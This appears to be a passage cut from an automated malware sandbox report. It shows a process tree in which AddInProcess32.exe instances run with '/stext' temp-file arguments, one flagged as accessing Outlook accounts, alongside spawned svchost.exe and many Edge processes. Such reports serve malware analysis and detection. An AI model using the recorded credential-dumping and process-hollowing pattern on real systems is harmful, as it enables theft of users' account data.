        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
        7⤵
        
        PID:4328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
        7⤵
        
        PID:4204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
        7⤵
        
        PID:4288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        7⤵
        
        PID:1612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1
        7⤵
        
        PID:5344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
        7⤵
        
        PID:5436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
        7⤵
        
        PID:5984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
        7⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
        7⤵
        
        PID:536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
        7⤵
        
        PID:4316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
        7⤵
        
        PID:244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
        7⤵
        
        PID:6116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
        7⤵
        
        PID:5480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
        7⤵
        
        PID:4940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
        7⤵
        
        PID:3700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
        7⤵
        
        PID:5152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
        7⤵
        
        PID:5600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
        7⤵
        
        PID:4856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
        7⤵
        
        PID:4772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
        7⤵
        
        PID:5704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
        7⤵
        
        PID:2312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
        7⤵
        
        PID:2024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6492 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7268 /prefetch:1
        7⤵
        
        PID:5792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7376 /prefetch:1
        7⤵
        
        PID:1452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:2028
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\hewjxrtbjaldc"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2152
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\kgbbqjdvxidqmfwm"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3224
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\uaguqcowkqvvolkqmjgi"
        5⤵
        
        PID:4140
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\uaguqcowkqvvolkqmjgi"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4292
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:4064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:4548
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3620
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5268
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:5280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:5876
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5908
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:2304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xd8,0xdc,0x104,0x10c,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:2644
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3988
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:1040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:392
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xfc,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:4384
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2156
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
